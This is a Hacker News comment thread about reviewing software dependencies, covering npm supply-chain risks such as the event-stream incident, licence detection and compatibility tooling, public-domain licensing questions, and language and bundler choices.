Hacker Read top | best | new | newcomments | leaders | about | bookmarklet login
Always Review Your Dependencies, AGPL Edition (www.agwa.name) similar stories update story
253 points by zdw | karma 117487 | avg karma 18.27 2020-01-06 00:00:06 | hide | past | favorite | 236 comments



view as:

That's the hidden cost of npm, cargo, pip, et. Al. The other one is IMO akin to overweight. Try to modernize a mid-sized project after one or two years and cry when you see the dependency graph.

Ceterum censeo go inferior est.


That is exactly why I always ask myself: Do I really need dependency X?

Because that dependency might itself have dependencies and this quickly grows out if hand with different versions etc. It might work now, but will it in the future? How many different versions of the same package do I really need to depend on?


>Ceterum censeo go inferior est.

AFAICT this means something like "furthermore, I opine that Go[lang] is inadequate".

It's some weird reference to an ancient Roman who always went on about destroying Carthage ("Carthago delenda est").

You, choeger, get the award for "weird reference I bothered to chase up".

Aside, I wonder if PM Johnson (a Classics scholar) had this in mind when his handlers instructed him to mimic Trump's rhetorical technique of "ignore the question just brainwash the suckers into associating you with this 3-word phrase".


I'm not sure if you are being ironic or not, but Cato the Elder is an extremely famous roman figure. I think most educated people, especially on HN, are familiar with his most famous phrase even if it is not in the most common formulation.

Well I've heard of him. But I suspect you greatly overestimate the importance of dead Romans to contemporary programmers.

It is no doubt possible to be a good, English speaking programmer, without knowing anything much about the Roman empire and its inhabitants, if you come from the east Asia for instance.

Even for those from the West, there are cultures which do not rate Ancient Rome as so significant that it is necessary for an educated person to be familiar with Cato the Elder's most famous phrase, whatever it may be.


> are familiar with his most famous phrase

In some cases, possibly, via Asterix: https://www.everythingasterix.com/latin-jokes-content/2015/4...


If you define the "modernization" as mindlessly switching to a trending framework or library, the cost is inevitable even without package managers.

You don't need to mindlessly switch to a trending framework or library.

Try upgrading typescript to the latest version. I think that's a fair definition of "modernisation" and something which should be benign.

But now all of a sudden you have to upgrade every dependency to the latest version - or write your own .d.ts files - since they're typically written to the current library version - typescript version combination.


The rust eco system has done a pretty good job at this.

The language and standard library is always backwards compatible (minor security fixes excepted). So updating to a newer language version just works.

Major libraries at the roots of many dependency trees have upgraded in backwards incompatible ways a few times, but the community has pretty consistently come together and helped move every other library that anyone uses to the new version.


I define modernization as anything from updating frameworks, over libraries, tools, to the language itself.

Quidquid latine dictum sit, altum videtur.

Presumably you need some functionality in the dependencies that you use. If you don't use a package manager then your options are:

* Import the dependency manually. This is taking a dependency without the formal description a package manager gives you, making it harder to audit, update etc.

* Write the functionality yourself. This guarantees you are not exposed to malicious code, but it takes time and your solution will likely have more bugs than a widely used solution. You also lose the ability to use other dependencies that build on top (e.g. React components) because you are now outside the mainstream.

What is actually needed is better tooling to analyze and prune dependency graphs.


> Ceterum censeo go inferior est.

Cur?


Because it did not even bother with a powerful and useful type system. Counter example: Rust. I don't think go would be a thing if rust was, say, two years older than it is.

It's always been weird to me how Microsoft invests so much in making JavaScript easy to develop and maintain with TypeScript but does so little to make it safe, the one thing JS needs is a standard library by Microsoft (or similar, e.g, Google) that we can trust, aiming to significantly reduce the number of dubious-origin dependencies of every JS project (on node and the browser)

Here's another opportunity to point out this unfortunate licensing bug in TypeScript's standard library:

https://github.com/microsoft/tslib/issues/47

(Disclaimer: I like TS, but I filed the above bug.)


Aside, can anyone explain this to me?

>Please do not use "public domain", it's not a license and it makes it impossible to use such code in corporate context. //

Seems pretty ridiculous, "can't use code unless it's encumbered by licensing restrictions"??



CC0 is a licence. "Public domain" is a state.

Some works have no copyright, typically because they're the product of a US Federal institution, or the copyright has expired. In American English this copyright-free state is also known as "public domain". (In British English it can mean something quite different.)

To put something in the "public domain", you need to make a statement of such. In other words, a licence. You could just say "I put this in the public domain" but it may not provide the certainty that bigcorps like. CC0 is a way of saying this in bigcorp-friendly language. (The CC0 page at https://creativecommons.org/share-your-work/public-domain/cc... explains this well.)

Alternatively, you can use WTFPL, which is a really great way of putting your works in the public domain while guaranteeing that bigcorps won't use them (see: statements on HN by Google people, passim).


>Alternatively, you can use WTFPL, which is a really great way of putting your works in the public domain while guaranteeing that bigcorps won't use them

I thought the point of WTFPL was that you didn't care who used your code for what.


Google will not use anything licensed under WTFPL. Other companies might be the same.

https://opensource.google/docs/thirdparty/licenses/#wtfpl-no...


>To put something in the "public domain", you need to make a statement of such. In other words, a licence. You could just say "I put this in the public domain" but it may not provide the certainty that bigcorps like. CC0 is a way of saying this in bigcorp-friendly language.

It's more than that - it's impossible to place things in to the public domain in many juristictions - like the UK.

(This is because copyright is property, and property must have an owner under the law of England and Wales [also Scots law I think, but I don't know]. Thus, a declaration that something is in the PD is of no effect.)


You can abandon property to public ownership (land, cars, anything you leave in the street in England & Wales: it gets sold and proceeds go to the Exchequer or Police) so your justification at the end doesn't sway me.

Moreover, Google have been allowed to assume ownership of intellectual property (content of books). The moral rights on those properties have been effectively cancelled.


>You can abandon property to public ownership (land, cars, anything you leave in the street in England & Wales: it gets sold and proceeds go to the Exchequer or Police) so your justification at the end doesn't sway me.

Sure, bona vacantia is A Thing - but your comment spells it out. The copyright gets _sold_ by the state to whoever wants to buy it.

That is not the same thing as public domain - the new owner can enforce their monopoly rights over the works which can screw over anybody depending on the work being "in the public domain".


"Public Domain" is encumbered by Moral Rights https://en.wikipedia.org/wiki/Moral_rights . While they play a very minor role in the US, they exist in Canada and most of the EU. Something like the MIT-license neatly gets rid of them.

Cool, thanks.

I'd argue that when I release something to the public domain that means that I give an open license such that the work can be used as if in the public domain until such time as it actually enters the public domain.

But, yes, I can see how that's a risk companies might avoid until caselaw backs that up.


Yeah, remember the left-pad incident? It took until ECMAScript 2017 to make such a simple function part of the standard library. Things are slowly getting better, but JS is still rather lacking compared to "batteries included" languages like PHP and Python.

This comes up pretty often, what would you like to see in such a standard library? I consider the libraries included in Node pretty extensive these days.

Node is a tiny part, the big fish is JavaScript in the browser

The person I replied to compared the stdlib to that of PHP and Python, both of which are backend components. Frontend land is getting frequent updates already, with a relatively good process, vendor backing and incubation in browsers, not sure what the complaint is supposed to be there? That it's too slow? Imho that's a good thing when it comes to most language changes.

Yeah is too slow, but is not only that, is that it makes senses for it to exist years on user-land as a library (or multiple ones) before being implemented on any standard.

For what it's worth, I don't think that's a bad thing. Assuming you're talking about jQuery and the like, what was adopted to the specifications is the consensus of many years and wouldn't have been predictable in the first few of that library's history. I mean, frontend land is incredibly fragmented and browsers are no operating systems. Clean APIs and stability, to me, are worth far more than being quick to adopt the latest trend. Otherwise we get competing pet standards again, "made for firefox / chrome" buttons, without significant developer adoption. Libraries and shimming aren't inherently bad, single line libraries on NPM are.

Google has already developed a good featureful JS library. It's called the Closure library. It can be used independently or together with the Closure compiler. It's also more than a decade old, ensuring widespread compatibility, though not necessarily using modern idioms.

Some communities like the ClojureScript uses it extensively and a front end project in ClojureScript require very few dependencies.


I have around a decade doing JavaScript and never heard of it before, any guesses why it might not be widely known/used?

Edit Answering to Jyaif: Anecdote is not data, here is it comparing the popularity of Closure library against Angular -another Google technology-: https://trends.google.com/trends/explore?date=today%205-y&ge...


FWIW I never wrote JS and yet I've heard of it.

> the one thing JS needs is a standard library by Microsoft

You must be new to this whole Microsoft vs Netscape thing :-)

What Microsoft should do is get Google & co. onboard with creating a full-featured standard library. Microsoft going at it alone would create a huuuuuge backlash because of ye olden days.


Fair enough, yeah it might be better as a collaboration, and if they could include Mozilla and Twitter in the mix that would be even better.

Package managers need to automatically derive properties of end builds based on licenses. E.g. Eclipse License 2.0 without the presence of another more liberal license means it cannot be used in copyleft software, any dependency that is copyleft is also infectious etc. Of course it won't account for every single legal property but the basic checks should be done. To prevent work duplication a single binary/library written in Go/Rust can take care of this problem and be used across all package managers. It is in the interest of GitHub to sponsor such a project.

This is one of the services that distros offer, for what it's worth. Every package in Debian is checked for copyright compliance against the DFSG, and annotated with the licenses that are controlling for that code.

The licensing of a dependency could be easily determined programmatically (GitHub already built a decent scanner). However, I think that the quality of a dependency is most important and that requires a manual vetting process. A trivial solution would be to create a crowd-sourced dependency vetting platform.

GitHub's license detection algorithm is crap. It tends to get GPLv2 right, but most other licenses are hit-and-miss. And I still can't find a setting where I can manually specify the license when GitHub can't autodetect one or gets it wrong.

Ruby gems have the license as an explicit field in the gemspec (manifest file). Is this not the case elsewhere?

It makes license scanning a doddle.


> It makes license scanning a doddle.

As someone working in the field of license compliance (leading an Open Source Program Office) and dealing with the licensing of tens of thousands of OSS dependencies on a daily basis for a large company I can tell you that license scanning / compliance is anything but a doddle. I do a lot of public speaking on this topic for a summary of the issues I recommend you to have a look at https://static.sched.com/hosted_files/ocs19/c7/OSS-Review-To...

Most modern package managers do offer project maintainers a way to declare the license for a project. However I can tell you that often the declared license does not match the licenses detected in the source code. What counts is the license stated in the source code files not what it's in the gemspec, package.json, pom.xml etc.

This is quite common issue especially for older or larger OSS projects where various contributors have added new code over time that may be licensed under an OSS license that is compatible but not the same as the main license of the projects (Think adding BSD-2-Clause in Apache-2.0 project) What happens is that this contributions get accepted but the project maintainers do not to update the declared license.

Not saying declaring a licensing in a .gemspec file is useless but just recommend you to take it as an indicator of the main license of the project - the project may include source code that licensed under a different license.

Lack of clarity around licenses and security vulnerabilities is a big issue within the OSS community especially as lack of clarity reduces engagement — that means fewer users, fewer contributors and a smaller community. Several organizations are working on a open source solution for this community problems see for further details https://clearlydefined.io/about

Full disclosure I am one of the maintainer of OSS Review Toolkit and contributor to ClearlyDefined.io


An even older tradition is a LICENSE file in the root of your project, which GitHub seems to read, but it's not great at matching up the license text to actual licenses.

An alternative tradition uses a COPYING file. I'm not sure which is older, but most GNU projects use COPYING instead of LICENSE. Meanwhile, some projects use COPYRIGHT or other variation, BSD-style licenses are often added directly to source files, and properly applying LGPLv3 to your project involves adding a separate COPYING.LESSER file. It's a mess.

I think most modern package managers have something like that: NPM has a license field in package.json, pypi in pkg-info, nuget in the nuspec file, etc.

Github uses the LICENSE file to detect licenses by default IIRC.


If you trust the license listed in gemspecs alone, you are almost guaranteed to be in violation of a license somewhere. ;)

It also can get things problematically wrong. Like licenses based on BSD3 with extra clauses tend to show up as BSD3.

But people will trust the license tag, and end up breaching the license.


Well, Linux distros are already pretty much that - crow-sourced dependency vetting platforms. Also take care of the bits actually fitting together & quite a bit of QA.

And so very old.

if you want the newest and shiniest there are rolling release distros.

> A trivial solution would be to create a crowd-sourced dependency vetting platform.

And then aren't you just recreating the old fashioned Linux distribution? No-one writes webapps to Linux distros any more; they're always based on language-specific, author-submitted, untrusted package managers because waiting for enough trust to build up to include the latest version of unnecessary-wrapper-for-document.getElementById-0.83.2 is considered stifling.

Maybe nixpkgs comes a little close, somewhat trusted and requiring third-party involvement, multiple versions simultaneously, but including new packages quickly enough. (And indeed, nixpkgs acts as distribution that can run on top of your distro or standalone as NixOS.)


> A trivial solution would be to create a crowd-sourced dependency vetting platform.

Such a platform is already being developed by various organizations, see https://clearlydefined.io/about and it already in use by GitHub. It's still under development and the initial focus is sharing data regarding copyrights, licenses and source code location for OSS packages.

Note that ClearyDefined only scans the code repository of OSS project it does not resolve dependencies for scanned OSS project. This makes sense as not all dependencies of OSS project B are inherited by a project A which included B as a dependency (due to dependency version resolution by the package manager or dependencies only used for testing).

The idea is that you will us an tool to resolve dependencies for the package manager your project uses which then queries the ClearyDefined APIs.

We are building such a tool as an open source project to manage of licensing and security for dependencies named OSS Review Toolkit (https://github.com/heremaps/oss-review-toolkit).

For a overview of the solution we are building see slide 9 in https://static.sched.com/hosted_files/ocs19/c7/OSS-Review-To...

Full disclosure: I am one of the maintainers of OSS Review Toolkit and also a contributor to ClearlyDefined.


There is https://www.fossology.org/ which helps a bit.

There are a lot of tools in this space:

https://wiki.debian.org/CopyrightReviewTools


If you want to do license compliance for various package managers then I recommend you checkout https://github.com/heremaps/oss-review-toolkit.

Full disclosure: I am one of the maintainers of OSS Review Toolkit.


This is a reason for Debian to exists.

Licenses cannot be reviewed automatically in a reliable way. Debian developers review the licenses and store them in a machine-parsable file.


Are you saying that standard licenses cannot be checked for compatibility automatically? Or that arbitrary homebrew licenses cannot be checked automatically?

Didn't Debian push a stable security update for Ghostscript that changed the license over to AGPL some time ago?

Did they break the license meta data while doing so?

Agreed. I found this project helpful for automating dependency checks: https://github.com/pivotal/LicenseFinder

I actually played around with turning it into a GitHub action for further usability improvement, although it needs more work: https://github.com/ralexander-phi/license_approval


Pivotal Lab’s license finder used to be my go to recommendation (and still is if “free” is an absolute requirement), but if a company takes license management seriously, I’d recommend checking out FOSSA[0] instead. It’s significantly better and fairly reasonably priced.

[0] https://fossa.com/


I think each respective package manager should just support this out of the box.

I think you would end up in a rabbit hole. Do you also review your all GNU/Linux libraries and dependencies? Probably not because you trust them. Thus I think we should be pragmatic and review only libraries which are created by unknown/untrusted creators.

Well I think you should at least do two things:

- avoid dependencies where you reasonably can. Less moving parts are usually good

- just have a look at the dependencies of your dependencies - this might help you decide which one to trust


Open-source projects can and do change maintainers. Adding a dependency means you not only trust the maintainer now, but you also trust all future maintainers of the project.

Dependencies are more dangerous (in this sense) because they compile into your application, so they can do anything they like to your customer data. A malicious tool could monitor your keystrokes and phone home, but it won't get installed on your production server.

A further problem with npm dependencies is that they get told when they're operating in dev mode and when in production mode. So malicious code can hide itself during dev and test, and then only do the bad thing on the production server.


Debian packages are maintained (and quickly vetted) by a rather small group of people (who vet each other). npm packages can be published by anyone without review.

On a somewhat related topic: https://drewdevault.com/2019/12/09/Developers-shouldnt-distr...


I would love to have this guy write my security sensitive software.

I used to work with a guy that would review every line of our projects node modules. He’d find issues all the time, so there’s no way he wasn’t pay attention. He also managed to be productive with writing his features. Having that guy on the team was amazing, I have no idea what motivated him to do such tedious work, but he seemed to love it...

With a bit of electronics background this feels like the difference between a hobbyist and a professional.

Most programmers feel like hobbyists to me, in their YOLO-approach. Your software might ruin someones day, their life or maybe even end up killing people and more people should take that thing seriously. The way your collegue worked should be the norm.


I'd think the comparison goes the other way around :). Hobbyists care enough to do things right even if it's not in the short-term interest. Professionals, judging by all the advice I read on-line, are supposed to focus on delivering value - which is usually measured short-term, and not aligned with doing things right. It's that attitude that makes most companies care little to none about security. Bringing in tons of dependencies in order to increase velocity and implement user-facing features faster is what I see advertised as archetype of a professional in this industry.

> I'd think the comparison goes the other way around :)

Only in the Software industry. This is however not normal:

* Mechanical Engineering: Hobbyist bridge vs. professional Bridge – which one should you be able to trust more to carry you?

* Electrical Engineering: Hobbyist wall wart vs. professional wall wart – which one should you be able to trust more not to burn your house down?

* Medical Treatment: Hobbyist vs. professional – which one do you trust more with your body?

The list goes on. Professional work isn't about cobbling together something that barely works at the edge of complexity you can just about manage. Professional work is building something reliable, robust that you can guarantuee for at least to a certain degree.

I know that this isn't how Software Development works right now in most places – that was the whole point of my comment. However it is not normal. It is a bit like with early cars: back then a hobbyist could have easily made a safer car than any professional manufacturer with the right amount of commitment, because there were no real safety standards. Try doing that nowadays.

Edit: Good related talk by the legend himself (Ross Anderson): https://media.ccc.de/v/36c3-10924-the_sustainability_of_safe...


IMHO, lots of software development resembles crafting much more than engineering and we have put so much effort into sounding smart that we are now training craftsmen that sound like scientists but are not necessarily good at their craft...

"I used the Singleton Pattern!" "Awesome, you learned about global variables!" blank stare


"All patterns are anti-patterns."

Or a factory method returning a singleton as a null object

Agree on mechanical and medical, but:

> Hobbyist wall wart vs. professional wall wart – which one should you be able to trust more not to burn your house down?

I will trust a well-known brand with lots at stake, like Apple. But on the other end of the spectrum, I would put more trust in a charger built from ground-up by a hobbyist I from my local Hackerspace than I would in a random charger off Amazon or AliExpress (and in fact, I had two no-name multi-port USB chargers from China fry themselves).

In general, I'll trust a hobbyist that cares about their craft more than someone doing it for money, unless the latter has their own skin in the game (e.g. doing a bad job would cost them real money, I can sue them, the government could put them in jail).

So with civil engineering, medical care and car manufacturing, I will trust the professionals - because there are strong legal incentives stopping them from cutting all possible corners or doing lots of nefarious things (that doesn't stop these industries from trying, though). But software is a completely different story. There's no protection, no incentives to counterbalance the sociopathy that arises when one optimizes profits too strongly. If you look at modern software, it all looks so great at the point of sale. The bad things - vendor lock-in, excessive telemetry, bad security, selling people out to advertisers, leaking the data due to bad security - all those things hurt users post-sale, and companies know that none of this meaningfully affects their profits in any way.

And even looking at the "normal" industries - at their culture - I have the impression that it's not the "for money" part that's responsible for quality, but the counterbalancing incentives; I think all these industries would be just as bad as software if it weren't for the regulation that retards the profit optimization.


I think GP’s choice of examples for electrical engineering wasn’t likely a good one, but their point generally stands for the time being. Sadly, I see electrical engineering degrading in quality as an industry in a similar fashion to the software industry has.

The risk profiles of the examples you gave are not comparable to that of most software projects. Most software projects are harmless if they crash. No one is hurt.

Software projects which do risk injury and dead, for example embedded medical, get a lot more engineering and QA.


While you are certainly right that certain fields are more deadly than others, less direct things like loosing personal pictures of someone, leaking someones unencrypted medical data, getting some abstract score wrong, etc. can seriously impact your users lifes. And even the more security critical fields constantly do things wrong. When you can change the workings of an insulin pump that is in someone elses body remotely and it turns out neither the programmer nor the regulators thought authentification might be a good idea, you know something is very wrong with a whole profession.

The latest Boeeing example is more of a regulatory failure, but somwhere someone sat and coded the behaviour that killed multiple hundreds of people.

We as programmers are just as responsible for what our stuff is doing as anybody else. Maybe even more so, because the work of our hands multiplies. If we put in the effort to make something a little easier, safer and faster that people use every day, you impact more lifes than you might know. And the same is true for the other direction.

Why is it, that software glitches are always seen as a god given higher force, that nobody could have prevented? I know managing complexity is hard, but there is proof out there that it can be done if wanted. We could wait till we are forced to do this by law, or (preferebly) develope at least a pinch of ethos for our own work.


I wouldn't bet on the industry reforming itself. If all other industries are an indication, quality and safety needs to be regulated in.

Boeing case is indeed good example. They cared about safety of their planes up until they figured out how to make more money by skillfully avoiding having to care. It looks like it blew up in their faces, but I'm not so sure of that - they're more than "too big to fail", they're a strategic company for the US, so the military won't let them fail.

> If we put in the effort to make something a little easier, safer and faster that people use every day, you impact more lifes than you might know.

My point (here and in parallel reply) is, if "being a professional" is defined as being focused on business objectives and bringing in revenue through your work, then putting in that effort, making things easier, safer and faster, are all - by that definition - unprofessional behavior. Sacrificing time and revenue for goals the market doesn't care about.


You can use some code he's written -- git-crypt[0] is fantastic at managing secrets :)

[0]: https://www.agwa.name/projects/git-crypt/


> I repeat the above recursively on transitive dependencies as many times as necessary. I also repeat the cursory code review any time I upgrade a dependency.

If this guy has to work on a "modern" frontend project, he's gonna review dependencies until the heat death of the universe.


But doesn‘t that say more about modern leftpaddable frontend frameworks than about the author?

It sure does. ‘Don’t repeat yourself’ and ‘avoid NIH syndrome’ are noble goals but ‘automatically update myriad libraries from random sources on the internet and then run them’ gives me the heebie jeebies.

Okay, but let's be clear about why we're putting "modern" in quotes. Sure, pulling in half of NPM is a common way to do things currently, but it's also a very painful way to do things, currently. A "modern" dependency tree is going to cause you tons of pain, starting with having to configure your dependency tree and getting worse from there. If you use a few, small, effective dependencies, you can reasonably do a cursory code review with every upgrade, and there are other major benefits.

Don't let some drive to be "modern" cause you to use libraries that make things more difficult than using vanilla JS.


What this guy does sounds like a machine-doable job.

At our company we use whitesource to scan each and every build for these kind of license violations.


Nearly spat out my cereal, thanks. Funny because accurate. As a relatively new node dev, this is what keeps me awake at night.

And his comment is copy-paste from Reddit: https://old.reddit.com/r/programming/comments/ekjacu/this_is...

Slightly ridiculous that we're getting to this point :-)


A reason why I appreciate Angular: then I know (or so I think?) someone else is vetting the base dependencies.

When this webpage loads, it briefly flashes in plaintext before loading CSS - at least in Chrome. This is unusual since it has the CSS stylesheet in the head which I thought would block until it's fully loaded. Does anyone know what's going on with that?

This is what happens when you dynamically insert your CSS tag in the head after the DOM loads.

If you view the raw data coming from the web server, the link tag containing the stylesheet is already present in the head. Although what you're saying sounds like it can absolutely cause this type of behaviour, I'm not sure if that's what's happening in this case.

You are correct. I suppose it could be an unreviewed NPM dependency causing this ;)

I guess render-blocking isn't really a thing, the HTML spec only describes script-blocking and is light on the rendering aspects. Now most web pages have styles and scripts and since styles block scripts, you usually perceive styles as render-blocking. But this web page doesn't have any scripts, so the browser reaches DOMContentLoaded right after parsing the HTML and does the first paint while the request for the style is still in flight.

At least that's my theory. You could test this by inserting an empty <script> tag into the <body>, which should delay DOMContentLoaded until the style arrives and prevent the flash of unstyled content.


Only <script> blocks by default, <link rel="stylesheet"> doesn't.

This is the classic FOUC that has been around for like 20+ years: https://en.wikipedia.org/wiki/Flash_of_unstyled_content

This is one of the items embedded Linux development using Yocto has particulary well covered. It checks every license for every package and you can ask it to verify the checksum of the license file. If the license changes after upgrading a package, you'll get a build error.

Not sure about this bit:

> This is quite a bit of work, but is necessary to avoid falling victim to attacks like _event-stream_.

Reviewing dependencies is important, but I don't think anything the author mentions would have made a difference with event-stream. The whole issue there was that malicious changes were snuck in via a change of maintainers and a later update to a child dependency, so when people initially adopted it as a dependency there were no red flags in the library to find.


He talks about reviewing dependencies when they are updated, as well, which certainly would help if someone snuck in malicious code in a minor version change.

Well, he talks about reviewing when he upgrades a dependency, but the tricksy thing about event-stream was that people could get the malicious change without having intended to upgrade anything.

The only thing that really prevents such issues is version locking of transitive dependencies (which the author doesn't mention, but it could be that his package manager does it by default, or similar..).


I had missed that npm doesn't (didn't?) lock package versions by default. That's really scary.

It does today, and I could be crazy but I think it did even before event-stream. But of course some users will have been on old versions of npm, or not checking in their lockfiles, etc.

I should add, I was probably wrong to talk about lockfiles preventing such issues. With event-stream the malicious code was hidden deviously enough to evade a pretty rigorous check - if a Node update hadn't deprecated one of the functions used in the payload, I suppose we might still not know about it. In such cases a lockfile is at least a layer of defense, but naturally it only helps if you're lucky enough to have installed the library before it got corrupted..


It seems like this is a good opportunity for Github to warn you if

a) a PR would merge a new dependency with an incompatible license to yours

and

b) allow you to filter out projects based on licenses from search results. in general most of us would prefer to avoid being tainted by GPL code and it'd be great to hide it on the site entirely.


Why don't npm-like package managers have settings for licenses in applications (as opposed to libraries)? Settings like "no AGPL" or "no copyleft dependencies" would allow easy vendoring with modifications. This (disabled by default) feature might break some proprietary code, but if it does, that indicates you were not following copyright law prior.

Obviously this doesn't solve the general quality problem with dependencies that the author notes, but it fixes some licensing issues.


Node's popular `pm2` itself is AGPL. I don't think they're too fussed about copyleft.

> I don't think they're too fussed about copyleft.

Yeah, and I'm not either. I have never decided to vendor dependencies, and my only modifications to GPL code were to upstream (so I didn't have a legal obligation to distribute the modified code - the distributors of the code I modified do). I just think automated license compatibility checking could be a good move for the ecosystem.

Also to be clear, I was talking about npm-like ecosystems. In my mind this includes npm, poetry and cargo (and probably more).


I hope on your comment you do not mix up LGPL and GPL.

Node has tons of AGPL packages which seem to be uses by quite a lot things.

I myself saw a pm2 error message in Linkedin's error 500 output


A GPL or AGPL software should not exist on NPM for libraries. For tools yes, but GPL for libraries is for 99% of the users a non-starter. It just does not belong into a library ecosystem.

To be clear: everyone has the free right to license their stuff how they like. I just think NPM as a ecosystem should be opinionated (and it is... Towards MIT. Just not completely).


There are over 200 OSI-certified open source licenses, and no automatable way to handle them.

I (and I'm sure many others) would gladly take an option to provide a whitelist of acceptable licenses.

I count 97 (https://opensource.org/licenses/alphabetical), but point taken.

Maybe there should be an organized effort to make some sort of compatibility matrix for all the OSI licenses...


Gentoo's package management system has neat automatable way to handle package licenses. See https://www.gentoo.org/glep/glep-0023.html

Yarn has `yarn licenses list`[1], which is very useful. And there is an accepted RFC for `yarn licenses check`[2] they would check against a list of allowed licenses.

[1] https://yarnpkg.com/lang/en/docs/cli/licenses/

[2] https://github.com/yarnpkg/rfcs/blob/master/accepted/0000-li...


I try to convince my team that the node.js ecosystem has gotten into a stage where it cannot be used for security/financial applications because the sheer amount of dependencies pose an inherent threat. I advocate for Go because of the tendency to less and easier reviewable dependencies. Nobody except me seems to see a problem there, despite me being able to point out specific security incidents.

I am wondering if I am missing something obvious here and would value any opinion.


TJ Holowaychuk said good bye to node in 2014 and switched to go. So your not the first.

https://medium.com/code-adventures/farewell-node-js-4ba9e7f3...


There's also Java and .NET for those who want better IDE support, better dependency management (without recursively downloading hundreds of packages), and a more traditional language and more fully featured language.

PS: I came to statically typed languages as an adult, I actually disliked those languages before I had the lightbulb moment, so I think I might even be more qualified than everyone who hasn't managed to enjoy both sides ;-)


Whilst the dependency management story on Node, Python is sub-par, it’s not all roses in Java land either with Maven and POM file XML-hell.

Use Gradle

Actually, again as someone who has some real life experience with a number of different systems, including

- pip for Python,

- NPM,

- Nuget

- and Maven (and Ant)

Maven is by far my favorite, despite XML.

In fact, give how small pom files are and how little you have to deal with them (if you know what you are doing) I find it amazing how many comments I have had to read about "XML-hell" etc.


This holds up if you actually do review all Go dependencies.

Times are changing, so all the power to you if you actually review it. Otherwise the advantage will remain a potential, never to be realised.


similarly, I refuse to use JS libs that have ridiculous dependency trees (most annoyingly, including Webpack, which means my Vue setup is more interesting than it needs to be).

I was explaining why to a friend, and it appears that no-one takes this threat seriously, not even in secure/financial apps.

Like you, I wonder if I'm missing something obvious. Why does the npm dependency trust nightmare give me the screaming heeby-jeebies but everyone else thinks it's all perfectly fine?


It's not just you. Screaming heebie-jeebies is exactly the correct response.

People who don't worry about it tell themselves that nothing that matters very much is coded in javascript, obvious exceptions notwithstanding.

Maybe the only practical way left to avoid it is to avoid javascript for things that matter, and to avoid products constructed with javascript for uses that matter. This might be an unpopular observation, but that does not make it wrong.

It is possible that WASM can fix much of this, at the cost of exposing ourselves to what might be extreme risks inherent in WASM itself. And of course, to whatever dependencies are brought in for the language we compile to WASM.


Indeed, rust is a likely wasm choice and it is working on an npm nightmare of its own with crates.io. A blessed crates pack is sorely needed to fill out the intentionally thin stdlib in cases you can't afford a dependency tree 20 layers deep for all the reasons mentione on this thread.

Several people have tried the "blessed crates pack" over the years, but they never gained traction, so people stopped working on them.

It's unfortunate that Rust is so tied to cargo, and unfortunate that cargo insists on allowing multiple versions of a dependency. If you point out that cargo is poorly designed everyone just yells and you and says you don't understand.

Only incompatible versions though — Rust dedups dependencies up to semver compatibility.

I think that's the right balance. clap 3 is and should be treated as a totally different package from clap 2.


It's not as bad as cabal back in the day.

Nonetheless I have run into the diamond dependency problem in practice. Their solution is unprincipled and there's no way to turn off the default behavior.


Do you mean passing a struct from e.g. clap 2 into clap 3? Yeah that won't work directly, nor should it in my opinion. If it is frequently required, projects can and should provide a compatibility layer which does any necessary conversions.

> Do you mean passing a struct from e.g. clap 2 into clap 3? Yeah that won't work directly, nor should it in my opinion.

I agree! But it shouldn't fail at compile time with a vexing error message. It should fail to resolve dependencies when calculating a build plan.


That would seem to completely disallow any compatibility layers, which seems like a bad outcome. Unless you had some sort of solution in mind for that?

I agree that the error message sucks, for what it's worth.


Can you elaborate on the design flaws that you perceive in Cargo?

The biggest flaw is that it makes taking new dependencies easy. I would prefer that it be hard, like in C++, so people think before doing it.

The second biggest flaw is that it couples package management to a programming language, despite those being almost completely unrelated concerns.


> The second biggest flaw is that it couples package management to a programming language, despite those being almost completely unrelated concerns.

Yes it's frustrating. I wish it was more decoupled, maybe with package standards like Haskell tried to do with Cabal.

It makes it hard to use Rust as a drop-in replacement for C. I can add a few C files to a Haskell project without much problem, but most rust code goes via cargo.


Yeah, my back-end is in Go, so being able to write the front end in Go as a simple cross-compile is great, if it was that simple.

We're a long way from it being that simple. There are "hello world" examples, but nothing close to a working GUI in Go-WASM yet.

I'd love a clone of Vue in Go-WASM. Just saying, if anyone out there wants to give it a try ;)


hmm, I always assumed it's a single "heeby-jeeby" and therefore multiple "heeby-jeebies", because that's how English mostly does singular/plural.

But the repetition in "heebie-jeebies" looks more appealing. Even if grammatically unlikely.

I'm confused now.

Is "heebie-jeebies" intrinsically plural (like "sheep"), and therefore the pluralisation doesn't matter?

Is there even such a thing as a single "heeby-jeeby"?


I can confidently state that I have never sighted a lone heeby-jeeby in the wild.

Heebie-jeebies are best thought of as an affliction, like hives or bedbugs, characterized by shuddering and head-ducking.

My guess is it started as a euphemism for hebephrenia, an obsolete affliction associated with youthful anxiety.


Seconded. Heebie-jeebies are uncountable.

I'll go with the consensus opinion, then. "Heebie-jeebies" it is :)

The dictionaries credit a comic strip "Barney Google" with coining the expression.

No saying whether that is really where the New Evil Empire got its name.


Because even in 2020, even in " secure/financial apps" most programmers have security and lic legality as a secondary (or even forth level) concerns, they just want to "make something cool"

They play lip service to it being secure, and/or license compliant


I would argue the reason developers don’t have concerns around licensing is partly due to lack of knowledge around the differences between licenses at a fundamental level and partly due to a “why should I care?” mentality at least at a subconscious level, if not higher.

A got a taste of it yet again this past weekend when I commented here on HN about GPL and AGPL being licenses that corporations often have concerns with.


I find it’s the opposite - people with limited understanding of licensing (and IP law in general) often have the most concerns, and misapprehensions.

> it appears that no-one takes this threat seriously, not even in secure/financial apps.

I think that's pretty standard for our industry, even outside the often comically lazy world of JS.


What are you using instead of Webpack? I have a very old personal project still using Webpack 2 and would love a simpler alternative that isn’t just downloading library dist files and checking them in to my project repo. I don’t even need babel or minification or any of that, just simple dependency version management and fetching.

I switched to Rollup for a project and liking it so far, also less dependencies:

Here's a comparison of popular bundlers using a visualization tool I found online:

Webpack - https://npm.anvaka.com/#/view/2d/webpack

Parcel - https://npm.anvaka.com/#/view/2d/parcel

Rollup - https://npm.anvaka.com/#/view/2d/rollup

Granted this only covers the initial package for each of these, there are usually a bunch of extra plugins or cli packages that you'll need to work with each of these but I also found the dependency tree of each of the added Rollup plugins to be less than the other 2.

here's rollup-plugin-babel: https://npm.anvaka.com/#/view/2d/rollup-plugin-babel


I'm wedging together Vue components by abusing the Go templating engine at the moment.

But it's not satisfactory because I can't unit test my components properly, or minify/obfuscate properly.

I'm looking at browserify to help with that, but that's going to break my whole build system so I need to find the appropriate time to do that.

Or there's Elm... I keep looking at Elm and wondering if that would solve a lot of these problems...


Rollup looks like it would fit my needs perfectly. Thank you!

I don't think anyone thinks it's perfectly fine (well, maybe newer people in the industry). I just don't think anyone sees a viable alternative.

